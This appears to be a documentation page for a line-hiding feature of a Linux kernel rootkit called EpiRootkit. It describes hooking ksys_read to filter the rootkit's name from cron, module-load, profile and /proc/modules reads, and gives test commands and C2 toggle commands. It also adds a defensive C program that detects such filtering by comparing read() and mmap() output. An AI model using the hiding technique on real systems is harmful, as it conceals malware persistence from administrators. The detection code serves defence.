Line Hiding
Hide rootkit lines from file contents using syscall interception
Implementation
static const char * const hide_line_patterns[] = {
    "epirootkit",
    "jules_est_bo_",
    "EpiRootkit",
    "modprobe epirootkit",
    "insmod epirootkit"
};

// Target paths:
//   "/etc/cron.d/"
//   "/etc/modules-load.d/"
//   "/etc/profile.d/"
//   "/proc/modules"
Hooks ksys_read, the kernel function behind the read syscall, and filters lines containing rootkit patterns from target files.
Module Hiding Complement
Module Hiding: Removes module from kernel list (affects lsmod)
Line Hiding: Filters /proc/modules content when read
Combined, they provide comprehensive module stealth.
Testing
# Test with provided file
sudo cp test_line_hiding_epirootkit.txt /etc/cron.d/test_epirootkit
cat /etc/cron.d/test_epirootkit
# Result: 24 lines → ~9 lines (rootkit patterns filtered)
# Test module information
cat /proc/modules | grep epirootkit
# Output: (nothing when line hiding active)
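From the detection side, filtering on the read path leaves a measurable inconsistency: for a regular file in one of the target directories, read() returns fewer bytes than the inode size reports, and its content differs from the mmap() view of the same file. The C check below is an added example, not part of EpiRootkit; the name read_view_differs is hypothetical, and it assumes only the read() path is filtered, as described above. It skips /proc/modules, which reports zero size and cannot be compared this way.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1: read() and mmap() views differ (read path may be filtered), 0: views agree,
 * -1: cannot check (open/IO error, not a regular file, or zero size as in procfs). */
int read_view_differs(const char *path)
{
    struct stat st;
    int result = -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_size > 0) {
        size_t size = (size_t)st.st_size, total = 0;
        char *mapped = mmap(NULL, size, PROT_READ, MAP_PRIVATE, fd, 0);
        char *buf = malloc(size);
        ssize_t n = 0;
        if (mapped != MAP_FAILED && buf != NULL) {
            /* Pull the content through the read() syscall until EOF or size bytes. */
            while (total < size && (n = read(fd, buf + total, size - total)) > 0)
                total += (size_t)n;
            if (n >= 0) /* an early EOF means fewer bytes than the inode reports */
                result = (total != size) || memcmp(buf, mapped, size) != 0;
        }
        free(buf);
        if (mapped != MAP_FAILED)
            munmap(mapped, size);
    }
    close(fd);
    return result;
}

int main(int argc, char **argv)
{
    /* Usage: ./check FILE...  (files under the target directories listed above) */
    int flagged = 0;
    for (int i = 1; i < argc; i++) {
        int r = read_view_differs(argv[i]);
        printf("%-10s %s\n", r == 1 ? "MISMATCH" : r == 0 ? "ok" : "skipped", argv[i]);
        flagged |= (r == 1);
    }
    return flagged;
}
```

A file that is being rewritten while the check runs can also produce a mismatch, so confirm a hit with a second run before treating it as evidence of filtering.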
Control
WebUI
Toggle via Configuration Panel
C2 Commands
enable-line-hiding Client-1 # Enable hiding
disable-line-hiding Client-1 # Disable hiding
status Client-1 # Check state